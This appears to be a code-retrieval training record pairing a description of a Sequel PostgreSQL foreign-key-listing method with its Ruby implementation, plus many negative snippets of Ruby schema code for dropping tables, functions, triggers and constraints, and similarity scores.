"def down\nexecute <<-SQL\n\tDROP TRIGGER IF EXISTS add_animal;\nSQL\n\nexecute <<-SQL\n\tDROP TRIGGER IF EXISTS update_animal;\nSQL\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS all_animals\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_species\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_name\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_tank\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_habitat\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_birthday\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS create_animal\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS update_animal\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS delete_animal\nSQL\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_animal\nSQL\nexecute <<-SQL\n DROP FUNCTION IF EXISTS get_animal_count\nSQL\n end",
"def drop_table(tablename)\r\n raise(ArgumentError, 'Table name must be a symbol!') unless \\\r\n tablename.is_a?(Symbol)\r\n raise \"Table does not exist!\" unless table_exists?(tablename)\r\n @table_hash.delete(tablename)\r\n\r\n return @engine.delete_table(tablename)\r\n end",
"def delete_table(table, options={})\n return send_message(SkyDB::Message::DeleteTable.new(table, options))\n end",
"def drop_table(table)\n connection.drop_collection(database,table)\n end",
"def drop_table\n self.connection.drop_table table_name\n end",
"def drop_table(table_name, options = {})\n table_name, options = extract_table_options(table_name, options)\n super(table_name, **options)\n end",
"def remove_foreign_key(table_name, *args)\n if self.adapter_name == \"PostgreSQL\" or self.adapter_name == \"MySQL\"\n options = args.extract_options!\n name = if options[:name]\n options[:name]\n else\n columns = args.first\n index_name(table_name, :column => Array(columns))\n end\n\n execute \"ALTER TABLE #{quote_table_name(table_name)} DROP FOREIGN KEY #{quote_column_name(name)}\"\n end\n end",
"def drop_table_statement(repository, model)\n \"DROP TABLE #{quote_table_name(model.storage_name(repository.name))}\"\n end",
"def sql_for_remove\n \"DROP FUNCTION IF EXISTS #{proname}(#{get_function_args})\"\n end",
"def drop_function(function_name, options = {})\n function_name = full_function_name(function_name, options)\n\n execute \"DROP FUNCTION #{function_name}\"\n end",
"def drop_table(name)\n not_exist(name)\n\n ORM::DBConnection.new(model_name(name)).remove_table(name)\n File.delete(\"app/services/db/tables/#{name}.json\")\n end",
"def supports_drop_table_if_exists?\n true\n end",
"def supports_drop_table_if_exists?\n true\n end",
"def remove(table,cond)\n connection.remove(path(table),cond)\n end",
"def destroy!\n drop_ddl = tables.map(&:name).map do |t|\n \"drop table if exists #{t};\\n\"\n end.join\n ActiveRecord::Base.connection.execute(drop_ddl)\n end",
"def destroy(table)\n end",
"def drop_table?(*names)\n options = names.last.is_a?(Hash) ? names.pop : OPTS\n if supports_drop_table_if_exists?\n options = options.merge(:if_exists=>true)\n names.each do |name|\n drop_table(name, options)\n end\n else\n names.each do |name|\n drop_table(name, options) if table_exists?(name)\n end\n end\n nil\n end",
"def remove_check(table_name, options)\n name = options.fetch(:name) { raise 'remove_check, :name option required' }\n\n execute <<-SQL\n ALTER TABLE #{quote_table_name(table_name)}\n DROP CONSTRAINT #{quote_column_name(name)}\n SQL\n end",
"def drop_proc(name, columns=[], cascade=false)\n execute \"DROP FUNCTION #{name.to_sql_name}(#{columns.collect {|column| column}.join(\", \")}) #{cascade_or_restrict(cascade)};\"\n end",
"def drop_proc(name, columns=[], cascade=false)\n execute \"DROP FUNCTION #{name.to_sql_name}(#{columns.collect {|column| column}.join(\", \")}) #{cascade_or_restrict(cascade)};\"\n end",
"def drop_rule(name, table)\n execute \"DROP RULE #{quote_rule(name)} ON #{quote_table_name(table)};\"\n end",
"def drop_function(function_name, options)\n\n end",
"def delete_table\n table_name = self.to_s.pluralize.underscore\n DATABASE.execute(\"DROP TABLE #{table_name}\")\n end",
"def drop_versioned_table\n self.connection.drop_table versioned_table_name\n end",
"def drop_join_table(hash, options=OPTS)\n drop_table(join_table_name(hash, options), options)\n end",
"def drop\n Statements::DropFunction.new(context: self)\n end",
"def drop_function(name, opts=OPTS)\n self << drop_function_sql(name, opts)\n end",
"def drop_column(table, *args)\n alter_table(table) {drop_column(*args)}\n end",
"def drop_column(table, *args)\n alter_table(table) {drop_column(*args)}\n end",
"def down\n drop_table TABLE_NAME\n end",
"def drop_table(klass)\n # Remove leftover data from some join tabkes.\n klass.relations.each do |rel|\n if rel.class.to_s == \"Og::JoinsMany\" and rel.join_table\n target_class = rel.target_class\n exec \"DELETE FROM #{rel.join_table}\"\n end\n end\n exec \"DROP TABLE #{klass.table}\"\n end",
"def delete_trigger(trigger_id)\n http_delete \"/triggers/#{trigger_id}\"\n end",
"def remove_foreign_key_constraint(table_name, options={})\n constraint_name = options[:name] || \"#{table_name}_ibfk_#{foreign_key}\"\n raise ArgumentError, \"You must specify the constraint name\" if constraint_name.blank?\n \n @connection.remove_foreign_key_constraint(table_name, constraint_name)\n end",
"def delete table\n table = table.to_sym\n @lookup = @lookup.reject { |k, v| k == table }\n @schema = @schema.reject { |k, v| k == table }\n nil\n end",
"def remove_trigger_from_service(*args)\n raise ArgumentError.new('The method `remove_trigger_from_service` requires 2 arguments (service-id and trigger-id).') if args.size != 2\n self.class.delete(\"/services/#{args[0]}/triggers/#{args[-1]}.json?apikey=#{apikey}\")\n end",
"def drop_foreign_key(from_table, from_column)\n execute [ \"alter table #{quote_table_name from_table}\",\n \"drop foreign key #{constraint_name from_table, from_column}\"\n ].join(' ')\n end",
"def delete_queries\n [\n \"DROP TRIGGER tr_#{suffix} ON #{src_table};\",\n \"DROP FUNCTION fn_#{suffix}();\",\n \"DROP TRIGGER tr_#{suffix}_cleaner ON #{surveys_table};\",\n \"DROP FUNCTION fn_#{suffix}_cleaner();\"\n ]\n end",
"def drop_table(*names)\n options = names.last.is_a?(Hash) ? names.pop : OPTS \n names.each do |n|\n execute_ddl(drop_table_sql(n, options))\n remove_cached_schema(n)\n end\n nil\n end",
"def DeleteTrigger id\n \n APICall(path: \"triggers/#{id}.json\",method: 'DELETE')\n \n end",
"def drop_table(table_name = temporary_table_name)\n ::RailsRedshiftReplicator.connection.exec \"drop table if exists #{table_name}\"\n end",
"def invoke_drop(method_or_key); end",
"def delete_table\n TinyDyno::Adapter.delete_table(table_name: self.table_name)\n end",
"def delete_traps\n @db.execute(\"DROP TABLE Traps\")\n end",
"def drop_view_sql(name, options)\n \"DROP VIEW#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def down\n \t# Example\n \t# Easy to undo something you create, but this doesn't work\n \t# because it is hard to fix mistakes.\n \t# drop_table :pictures\n end",
"def drop\n do_callback(:before_drop)\n collection.drop\n do_callback(:after_drop)\n end",
"def drop!(db, colls = nil)\n db.in_transaction do |conn|\n schema_tables(conn).each do |table|\n conn.exec \"DROP TABLE IF EXISTS #{table}\"\n end\n end\n end",
"def create_trigger(table, name, function, opts=OPTS)\n self << create_trigger_sql(table, name, function, opts)\n end",
"def drop_function(name, custom_drop_statement = nil)\n Scenic.database.drop_function(name, custom_drop_statement)\n end",
"def unlink\n self.transaction do\n self.class.factory.model.connection.execute <<-SQL\n ALTER TABLE #{name} NO INHERIT #{self.class.factory.model.table_name};\n ALTER TABLE #{name} RENAME TO #{name}_unlinked;\n SQL\n self.destroy\n end\n end",
"def disable_trigger(trigger = 'ALL')\n connection.disable_trigger(table_name, trigger)\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_identifier(name)}\"\n end",
"def delete_table(table_id); delete(\"tables/#{table_id}\"); nil; end",
"def add_trigger(table, events, options={})\n events += [:row] if options.delete(:row)\n events += [:before] if options.delete(:before)\n trigger = TriggerDefinition.new(0, table, options[:name], events, options[:function])\n execute trigger.to_sql_create\n end",
"def add_trigger(table, events, options={})\n events += [:row] if options.delete(:row)\n events += [:before] if options.delete(:before)\n trigger = TriggerDefinition.new(0, table, options[:name], events, options[:function])\n execute trigger.to_sql_create\n end",
"def purge\n @db.execute( \"DELETE FROM #{TABLE_NAME};\" )\n end",
"def drop_schema_sql(name, opts=OPTS)\n \"DROP SCHEMA#{' IF EXISTS' if opts[:if_exists]} #{quote_identifier(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def remove_foreign_key(from_table, from_column, to_table)\n constraint_name = \"fk_#{from_table}_#{from_column}\"\n # check if constraint already exist\n count = ActiveRecord::Base.connection.select_value(\"select count(1) from pg_constraint where conname='#{constraint_name}'\")\n\n unless count.to_i == 0\n execute %{ALTER TABLE #{from_table} DROP CONSTRAINT #{constraint_name}}\n end\n end",
"def drop_table?\n db.drop_table?(table_name)\n end",
"def drop_constraint(table, name)\n current_instructions << Instructions::DropConstraint.new(\n table: table,\n name: name,\n )\n end",
"def drop\n\n\t\t# for user\n\t\tif(!current_user.admin)\n\t\t\tBook.where('owner_id' => current_user.id).delete_all\n\t\telse\n\t\t\tBook.delete_all\n\t\tend\n\t\t\n\t\tflash[:success] = \"Deleted table book!\"\n\t\tredirect_to '/books'\n\tend",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def remove_reference(table, ref_name, **kwargs)\n current_instructions << Instructions::RemoveReference.new(\n table: table,\n ref_name: ref_name,\n **kwargs,\n )\n end",
"def delete_table(table_name, options = {})\n call(:delete, table_uri(table_name, new_query(options)), nil, {}, options)\n nil\n end",
"def create_trigger(table_name, proc_name, event, options = {})\n\n end",
"def uninstall_on!(db, options = {})\n sql = \"\"\n all_objects_in_order.reverse.each{|o| \n begin\n sql = o.to_clean_sql(db)\n execute_ddl(db, sql, options)\n rescue Sequel::Error => ex\n puts \"Ignoring: #{ex.message}\" if options[:verbose]\n end\n }\n db\n end",
"def to_drop_constraint_sql(db)\n if db.supports_external_drop_constraints?\n gen = ::Sequel::Schema::AlterTableGenerator.new(db)\n gen.drop_constraint(self.name)\n db.send(:alter_table_sql_list, relvar.namespace_qualified_name(db), gen.operations)[0]\n else\n \"\"\n end\n end",
"def pgt_trigger(table, trigger_name, function_name, events, definition, opts={})\n create_function(function_name, definition, :language=>:plpgsql, :returns=>:trigger, :replace=>true)\n create_trigger(table, trigger_name, function_name, :events=>events, :each_row=>true, :after=>opts[:after])\n end",
"def drop\n File.unlink @file if File.exist?(@file)\n self\n end",
"def test_drop_table_if_exists\n connection.create_table(:testings)\n assert connection.table_exists?(:testings)\n connection.drop_table(:testings, if_exists: true)\n assert_not connection.table_exists?(:testings)\n end",
"def delete_hook(id)\n delete(\"/hooks/#{id}\")\n end",
"def drop_tables!\n migrate(:down)\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def remove(name)\n if hook = by_name(name)\n hook.destroy!\n end\n end",
"def drop\n ensure_service!\n service.drop_database instance_id, database_id\n true\n end",
"def drop\n ensure_service!\n service.drop_database instance_id, database_id\n true\n end",
"def destroy!\n Dropio::Resource.client.delete_drop(self)\n end",
"def create_trigger_sql(table, name, function, opts=OPTS)\n events = opts[:events] ? Array(opts[:events]) : [:insert, :update, :delete]\n whence = opts[:after] ? 'AFTER' : 'BEFORE'\n if filter = opts[:when]\n raise Error, \"Trigger conditions are not supported for this database\" unless supports_trigger_conditions?\n filter = \" WHEN #{filter_expr(filter)}\"\n end\n \"CREATE #{'OR REPLACE ' if opts[:replace]}TRIGGER #{name} #{whence} #{events.map{|e| e.to_s.upcase}.join(' OR ')} ON #{quote_schema_table(table)}#{' FOR EACH ROW' if opts[:each_row]}#{filter} EXECUTE PROCEDURE #{function}(#{Array(opts[:args]).map{|a| literal(a)}.join(', ')})\"\n end",
"def invoke_drop(key); end",
"def unlink_from(table)\n invalidate_cache\n remove_layers_from(table)\n end",
"def delete(key)\n run_hook(:before_delete)\n db.delete(key)\n run_hook(:after_delete)\n end",
"def delete_buttons\n @db.execute(\"DROP TABLE Buttons\")\n end"
] |
[
"0.7669092",
"0.7631279",
"0.7302634",
"0.7302634",
"0.69826895",
"0.670343",
"0.66852194",
"0.6222981",
"0.6037891",
"0.5920438",
"0.57999533",
"0.5695673",
"0.5686736",
"0.5677208",
"0.56751347",
"0.56388307",
"0.56238425",
"0.5610893",
"0.5580581",
"0.555721",
"0.55252904",
"0.549507",
"0.54498655",
"0.5410577",
"0.53953636",
"0.5394435",
"0.5376919",
"0.531402",
"0.5286162",
"0.52819204",
"0.52819204",
"0.5273361",
"0.5221611",
"0.5220301",
"0.52132803",
"0.5213014",
"0.5196396",
"0.5196396",
"0.51925683",
"0.5176595",
"0.5175543",
"0.5133974",
"0.51278025",
"0.5108515",
"0.5088684",
"0.506368",
"0.506368",
"0.50549185",
"0.5046434",
"0.50452846",
"0.50421524",
"0.5033331",
"0.50262904",
"0.5004284",
"0.49996296",
"0.49992883",
"0.49984264",
"0.49932984",
"0.49931493",
"0.4987809",
"0.49723774",
"0.49292147",
"0.49284413",
"0.49269363",
"0.492063",
"0.491252",
"0.49028602",
"0.4872222",
"0.48499125",
"0.48385784",
"0.48332793",
"0.48287734",
"0.48287734",
"0.47997507",
"0.47970602",
"0.47859535",
"0.4784325",
"0.4783418",
"0.47729468",
"0.47699612",
"0.47579223",
"0.47573698",
"0.4750096",
"0.4738652",
"0.47194195",
"0.47170275",
"0.47095242",
"0.47093394",
"0.47002184",
"0.4698298",
"0.46951893",
"0.4688789",
"0.46787006",
"0.46787006",
"0.46622545",
"0.4659873",
"0.46566352",
"0.4645769",
"0.46444547",
"0.46303168"
] |
0.7433689
|
2
|
Return full foreign key information using the pg system tables, including :name, :on_delete, :on_update, and :deferrable entries in the hashes. Supports additional options: :reverse :: Instead of returning foreign keys in the current table, return foreign keys in other tables that reference the current table. :schema :: Set to true to have the :table value in the hashes be a qualified identifier. Set to false to use a separate :schema value with the related schema. Defaults to whether the given table argument is a qualified identifier.
|
def foreign_key_list(table, opts=OPTS)
m = output_identifier_meth
schema, _ = opts.fetch(:schema, schema_and_table(table))
h = {}
fklod_map = FOREIGN_KEY_LIST_ON_DELETE_MAP
reverse = opts[:reverse]
(reverse ? _reverse_foreign_key_list_ds : _foreign_key_list_ds).where_each(Sequel[:cl][:oid]=>regclass_oid(table)) do |row|
if reverse
key = [row[:schema], row[:table], row[:name]]
else
key = row[:name]
end
if r = h[key]
r[:columns] << m.call(row[:column])
r[:key] << m.call(row[:refcolumn])
else
entry = h[key] = {
:name=>m.call(row[:name]),
:columns=>[m.call(row[:column])],
:key=>[m.call(row[:refcolumn])],
:on_update=>fklod_map[row[:on_update]],
:on_delete=>fklod_map[row[:on_delete]],
:deferrable=>row[:deferrable],
:table=>schema ? SQL::QualifiedIdentifier.new(m.call(row[:schema]), m.call(row[:table])) : m.call(row[:table]),
}
unless schema
# If not combining schema information into the :table entry
# include it as a separate entry.
entry[:schema] = m.call(row[:schema])
end
end
end
h.values
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def dump_table_foreign_keys(table, options=OPTS)\n if supports_foreign_key_parsing?\n fks = foreign_key_list(table, options).sort_by{|fk| fk[:columns]}\n end\n\n if fks.nil? || fks.empty?\n ''\n else\n dump_add_fk_constraints(table, fks)\n end\n end",
"def foreign_key_list(table, opts=OPTS)\n m = output_identifier_meth\n fks = ado_schema_foreign_keys(table).inject({}) do |memo, fk|\n name = m.call(fk['FK_NAME'])\n specs = memo[name] ||= {\n :columns => [],\n :table => m.call(fk['PK_TABLE_NAME']),\n :key => [],\n :deferrable => fk['DEFERRABILITY'],\n :name => name,\n :on_delete => fk['DELETE_RULE'],\n :on_update => fk['UPDATE_RULE']\n }\n specs[:columns] << m.call(fk['FK_COLUMN_NAME'])\n specs[:key] << m.call(fk['PK_COLUMN_NAME'])\n memo\n end\n fks.values\n end",
"def foreign_keys(table_name)\n stmt = @connection.foreign_keys(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n\n result.map do |key|\n fk_from_table = key[2] # PKTABLE_NAME\n fk_to_table = key[6] # FKTABLE_NAME\n\n ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new(\n fk_from_table,\n fk_to_table,\n name: key[11], # FK_NAME\n column: key[3], # PKCOLUMN_NAME\n primary_key: key[7], # FKCOLUMN_NAME\n on_delete: key[10], # DELETE_RULE\n on_update: key[9] # UPDATE_RULE\n )\n end\n end",
"def foreign_keys(table_name, stream)\n if (foreign_keys = @connection.foreign_keys(table_name)).any?\n add_foreign_key_statements = foreign_keys.map do |foreign_key|\n options = foreign_key.options\n table_from_key = foreign_key.to_table\n statement_parts = [ ('add_foreign_key ' + foreign_key.from_table.inspect) ]\n statement_parts << table_from_key.inspect\n statement_parts << (':name => ' + options[:name].inspect)\n\n column_from_options = options[:column]\n primary_key_from_options = options[:primary_key]\n dependent_from_options = options[:dependent]\n\n if column_from_options != \"#{table_from_key.singularize}_id\"\n statement_parts << (\":column => #{column_from_options.inspect}\")\n end\n if primary_key_from_options != 'id'\n statement_parts << (\":primary_key => #{primary_key_from_options.inspect}\")\n end\n if dependent_from_options.present?\n statement_parts << (\":dependent => #{dependent_from_options.inspect}\")\n end\n\n # Always exclude the index\n # If an index was created in a migration, it will get dumped to the schema\n # separately from the foreign key. This will raise an exception if\n # add_foreign_key is run without :exclude_index => true.\n statement_parts << (':exclude_index => true')\n\n ' ' + statement_parts.join(', ')\n end\n\n stream.puts add_foreign_key_statements.sort.join(\"\\n\")\n stream.puts\n end\n end",
"def foreign_keys\n @foreign_keys ||= connection.foreign_keys(table_name, \"#{name} Foreign Keys\")\n end",
"def references_with_foreign_key(*args)\n # Don't pop, unlike extract_options!, because we need to leave *args intact.\n options = args.last.is_a?(::Hash) ? args.last : {}\n polymorphic = options.has_key? :polymorphic\n\n references_without_foreign_key *args\n\n # Now we discard any options.\n options = args.extract_options! \n\n unless polymorphic\n args.each do |column|\n @@foreign_keys << [\"#{column}_id\", options]\n end\n end\n end",
"def foreign_key?\n @ref_table ? true : false\n end",
"def import_foreign_keys( table )\n for opts in db.foreign_key_list( table.name )\n opts = opts.dup\n name = opts.delete( :name )\n columns = opts.delete( :columns )\n table_name = opts.delete( :table )\n opts.delete( :deferrable ) unless opts[ :deferrable ]\n table.add_foreign_key( columns, table_name, opts )\n end\n end",
"def foreign_keys_from_associations(fields = association_fields)\n fields.each_with_object([]) do |(_field_name, metadata), keys|\n keys << metadata[:foreign_key] if metadata[:foreign_key]\n keys << metadata[:polymorphic_type] if metadata[:polymorphic_type]\n keys\n end\n end",
"def foreign_keys_from_associations(fields = association_fields)\n fields.each_with_object([]) do |(_field_name, metadata), keys|\n keys << metadata[:foreign_key] if metadata[:foreign_key]\n keys << metadata[:polymorphic_type] if metadata[:polymorphic_type]\n keys\n end\n end",
"def foreign_key\n meta(foreign_key: true)\n end",
"def tables_with_referential_integrity\n schemas_and_tables = select_rows <<-SQL.strip_heredoc\n SELECT s.name, o.name\n FROM sys.foreign_keys i\n INNER JOIN sys.objects o ON i.parent_object_id = o.OBJECT_ID\n INNER JOIN sys.schemas s ON o.schema_id = s.schema_id\n SQL\n schemas_and_tables.map do |schema_table|\n schema, table = schema_table\n \"#{SQLServer::Utils.quoted_raw(schema)}.#{SQLServer::Utils.quoted_raw(table)}\"\n end\n end",
"def dump_add_fk_constraints(table, fks)\n sfks = String.new\n sfks << \"alter_table(#{table.inspect}) do\\n\"\n sfks << create_table_generator do\n fks.sort_by{|fk| fk[:columns]}.each do |fk|\n foreign_key fk[:columns], fk\n end\n end.dump_constraints.gsub(/^foreign_key /, ' add_foreign_key ')\n sfks << \"\\nend\"\n end",
"def associations_foreigns\n _reflections.map do |_, reflection|\n cols = [reflection.foreign_key]\n cols << reflection.foreign_type if reflection.polymorphic?\n cols\n end.flatten\n end",
"def foreign_key_list(table, opts=OPTS)\n super\n rescue Sequel::DatabaseError => e\n raise unless foreign_key_error?(e)\n []\n end",
"def to_dump(opts={})\n dump = (opts[:inline] ? \" t.foreign_key\" : \"add_foreign_key #{table_name.inspect},\")\n dump << \" [#{Array(column_names).collect{ |name| name.inspect }.join(', ')}]\"\n dump << \", #{references_table_name.inspect}, [#{Array(references_column_names).collect{ |name| name.inspect }.join(', ')}]\"\n dump << \", :on_update => #{on_update.inspect}\" if on_update\n dump << \", :on_delete => #{on_delete.inspect}\" if on_delete\n dump << \", :deferrable => #{deferrable.inspect}\" if deferrable\n dump << \", :name => #{name.inspect}\" if name\n dump << \"\\n\"\n dump\n end",
"def to_sql_with_foreign_keys\n from_table = AirBlade::Migrations::SchemaStatements.table_name\n fks = @@foreign_keys.map{ |column, options| foreign_key_constraint from_table, column, options }\n [ to_sql_without_foreign_keys, fks ].reject{ |x| x.blank? }.join ', '\n end",
"def references(*args)\n options = args.extract_options!\n polymorphic = options.delete(:polymorphic)\n\n options[:referenced_table] = options.delete(:table)\n if options[:referenced_table] && polymorphic\n raise ArgumentError, \"not possible to create a foreign key on a polymorphic association\"\n end\n\n args.each do |col|\n column(\"#{col}_id\", :integer, options)\n foreign_key(\"#{col}_id\", options[:referenced_table], 'id') if options[:referenced_table]\n column(\"#{col}_type\", :string, polymorphic.is_a?(Hash) ? polymorphic : options) unless polymorphic.nil?\n end\n end",
"def find_relations\n sql = <<-eos\n SELECT\n tc.constraint_name, tc.table_name, kcu.column_name,\n ccu.table_name AS foreign_table_name,\n ccu.column_name AS foreign_column_name\n FROM\n information_schema.table_constraints AS tc\n JOIN information_schema.key_column_usage AS kcu ON tc.constraint_name = kcu.constraint_name\n JOIN information_schema.constraint_column_usage AS ccu ON ccu.constraint_name = tc.constraint_name\n WHERE constraint_type = 'FOREIGN KEY'\n eos\n @relations = @connection.exec(sql).values\n end",
"def hash_fk_model\n foreign_keys = {}\n @model_class.reflect_on_all_associations(:belongs_to).map{ |r|\n foreign_keys[r.association_foreign_key.to_sym] = r.name\n }\n foreign_keys\n end",
"def reverse_foreign_keys\n connection.reverse_foreign_keys(table_name, \"#{name} Reverse Foreign Keys\")\n end",
"def foreign_key_constraint(from_table, from_column, options = {})\n to_table = options[:to_table] || from_column.to_s[/^(.+)_id$/, 1].tableize\n on_delete = case options[:on_delete]\n when :cascade; 'cascade'\n when :nullify; 'set null'\n end\n on_update = case options[:on_update]\n when :cascade; 'cascade'\n when :nullify; 'set null'\n when :restrict; 'restrict'\n end\n cmd = [ \"constraint #{constraint_name from_table, from_column}\",\n \"foreign key (#{from_column})\",\n \"references #{ActiveRecord::Base.connection.quote_table_name to_table}(id)\",\n ]\n cmd << \"on delete #{on_delete}\" if on_delete\n cmd << \"on update #{on_update}\" if on_update\n cmd.join(' ')\n end",
"def foreign_keys\n vals = []\n foreign_key_fields.each do |field|\n vals << self.send(field)\n end\n vals\n end",
"def foreign_key_fields\n keys = []\n database_field_names.each do |param|\n if self.send(param).is_a? ForeignKey\n keys << param\n end\n end\n keys\n end",
"def foreign_key_name(table_name, columns)\n keys = foreign_key_list(table_name).select{|key| key[:columns] == columns}\n raise(Error, \"#{keys.empty? ? 'Missing' : 'Ambiguous'} foreign key for #{columns.inspect}\") unless keys.size == 1\n keys.first[:name]\n end",
"def remember_foreign_key_columns(node)\n table_name = @table_name\n foreign_key_column = node.arguments.all.first.to_s\n @foreign_keys[table_name] ||= []\n if foreign_key_column =~ /(.*?)_id$/\n @foreign_keys[table_name] <<\n if @foreign_keys[table_name].delete(\"#{Regexp.last_match(1)}_type\")\n [\"#{Regexp.last_match(1)}_id\", \"#{Regexp.last_match(1)}_type\"]\n else\n foreign_key_column\n end\n foreign_id_column = foreign_key_column\n elsif foreign_key_column =~ /(.*?)_type$/\n @foreign_keys[table_name] <<\n if @foreign_keys[table_name].delete(\"#{Regexp.last_match(1)}_id\")\n [\"#{Regexp.last_match(1)}_id\", \"#{Regexp.last_match(1)}_type\"]\n else\n foreign_key_column\n end\n foreign_id_column = \"#{Regexp.last_match(1)}_id\"\n end\n\n if foreign_id_column\n index_node = node.arguments.all.last.hash_value('index')\n if index_node.present? && (index_node.to_s != 'false')\n @index_columns[table_name] ||= []\n @index_columns[table_name] << foreign_id_column\n end\n end\n end",
"def remember_foreign_key_columns(node)\n table_name = @table_name\n foreign_key_column = node.arguments[1].to_s\n @foreign_keys[table_name] ||= []\n if foreign_key_column =~ /(.*?)_id$/\n if @foreign_keys[table_name].delete(\"#{$1}_type\")\n @foreign_keys[table_name] << [\"#{$1}_id\", \"#{$1}_type\"]\n else\n @foreign_keys[table_name] << foreign_key_column\n end\n elsif foreign_key_column =~ /(.*?)_type$/\n if @foreign_keys[table_name].delete(\"#{$1}_id\")\n @foreign_keys[table_name] << [\"#{$1}_id\", \"#{$1}_type\"]\n else\n @foreign_keys[table_name] << foreign_key_column\n end\n end\n end",
"def record_foreign_keys(parent_record)\n association_foreign_keys(parent_record)\n end",
"def foreign_key?\n options.fetch(:foreign_key, false)\n end",
"def foreign_key(relation)\n detect { |attr| attr.foreign_key? && attr.target == relation }\n end",
"def supports_foreign_tables?\n false\n end",
"def supports_foreign_tables?\n false\n end",
"def association_foreign_keys(assoc_record)\n association_foreign_keys_names.map { |name| assoc_record.public_send(name) }\n end",
"def foreign_key\n @foreign_key ||= (@options[:foreign_key] || \"#{@name}_id\").to_s\n end",
"def get_keys\n table_cond = @files ? \"AND r.relname IN (#{@files.map{|(t,f)|\"'#{t}'\"}.join(', ')})\" : ''\n results = query(<<-SQL)\n SELECT\n r.relname,\n c.conname,\n c.contype,\n pg_get_constraintdef(c.oid)\n FROM\n pg_class r,\n pg_constraint c\n WHERE\n c.conrelid = r.oid\n AND c.contype IN ('f', 'p')\n AND r.relkind = 'r'\n AND r.relnamespace = (SELECT oid FROM pg_namespace WHERE nspname = '#{@config[:schema]}')\n #{table_cond}\n SQL\n\n hash = {}\n results.map do |row|\n table, key, type, create_sql = row.split(/\\t/)\n hash[key] = {:table => table, :type => type == 'p' ? :primary_key : :foreign_key, :create_sql => create_sql}\n end\n hash\n end",
"def find_table_by_foreign_key(column_name)\n @opts[:foreign_key][:alias].values_at(column_name).first\n end",
"def conventional_foreign_key?\n parent_table == naming_conventions.parent_table_for(foreign_key)\n end",
"def create_table_with_storing_name(table_name, options = {}, &block)\n @@table_name = table_name\n create_table_without_storing_name table_name, options, &block\n AirBlade::Migrations::SchemaDefinitions.foreign_keys = []\n end",
"def belongs_to_with_foreign_key_migrations(*args)\n options = args.extract_options!\n options[:references] = nil if options[:polymorphic]\n belongs_to_without_foreign_key_migrations(*args.push(options))\n end",
"def belongs_to_with_foreign_key_migrations(*args)\n options = args.extract_options!\n options[:references] = nil if options[:polymorphic]\n belongs_to_without_foreign_key_migrations(*args.push(options))\n end",
"def foreign_key\n @foreign_key ||= @options[:foreign_key] ? @options[:foreign_key].to_s :\n default_foreign_key_field\n end",
"def scaf_foreign_keys\n scaf_belongs_tos.collect(&:primary_key_name)\n end",
"def foreign_key\n @resource_options.fetch :foreign_key,\n :\"#{tools.string.singularize association_name}_id\"\n end",
"def to_dump\n opts = {column: self.column}.merge options_for_dump\n dump = \"add_foreign_key #{from_table.inspect}, #{to_table.inspect}, #{opts.to_s.sub(/^{(.*)}$/, '\\1')}\"\n end",
"def referenced_tables(tables)\n result = {}\n tables.each do |table|\n result[table] = []\n self.select_all(\"select reftabname from syscat.references where tabname = '#{table.upcase}'\").each do |row|\n result[table] << row['reftabname'].downcase\n end\n end\n result\n end",
"def supports_deferrable_foreign_key_constraints?\n true\n end",
"def supports_deferrable_foreign_key_constraints?\n true\n end",
"def foreign_key_for?(record)\n foreign_key = Array(reflection.foreign_key)\n foreign_key.all? { |key| record._has_attribute?(key) }\n end",
"def dump_foreign_key_migration(options=OPTS)\n ts = _dump_tables(options)\n <<END_MIG\nSequel.migration do\n change do\n#{ts.map{|t| dump_table_foreign_keys(t)}.reject{|x| x == ''}.join(\"\\n\\n\").gsub(/^/, ' ')}\n end\nend\nEND_MIG\n end",
"def __foreign_key_list_ds(reverse)\n if reverse\n ctable = Sequel[:att2]\n cclass = Sequel[:cl2]\n rtable = Sequel[:att]\n rclass = Sequel[:cl]\n else\n ctable = Sequel[:att]\n cclass = Sequel[:cl]\n rtable = Sequel[:att2]\n rclass = Sequel[:cl2]\n end\n\n if server_version >= 90500\n cpos = Sequel.expr{array_position(co[:conkey], ctable[:attnum])}\n rpos = Sequel.expr{array_position(co[:confkey], rtable[:attnum])}\n # :nocov:\n else\n range = 0...32\n cpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:conkey], [x]), x]}, 32, ctable[:attnum])}\n rpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:confkey], [x]), x]}, 32, rtable[:attnum])}\n # :nocov:\n end\n\n ds = metadata_dataset.\n from{pg_constraint.as(:co)}.\n join(Sequel[:pg_class].as(cclass), :oid=>:conrelid).\n join(Sequel[:pg_attribute].as(ctable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:conkey])).\n join(Sequel[:pg_class].as(rclass), :oid=>Sequel[:co][:confrelid]).\n join(Sequel[:pg_attribute].as(rtable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:confkey])).\n join(Sequel[:pg_namespace].as(:nsp), :oid=>Sequel[:cl2][:relnamespace]).\n order{[co[:conname], cpos]}.\n where{{\n cl[:relkind]=>%w'r p',\n co[:contype]=>'f',\n cpos=>rpos\n }}.\n select{[\n co[:conname].as(:name),\n ctable[:attname].as(:column),\n co[:confupdtype].as(:on_update),\n co[:confdeltype].as(:on_delete),\n cl2[:relname].as(:table),\n 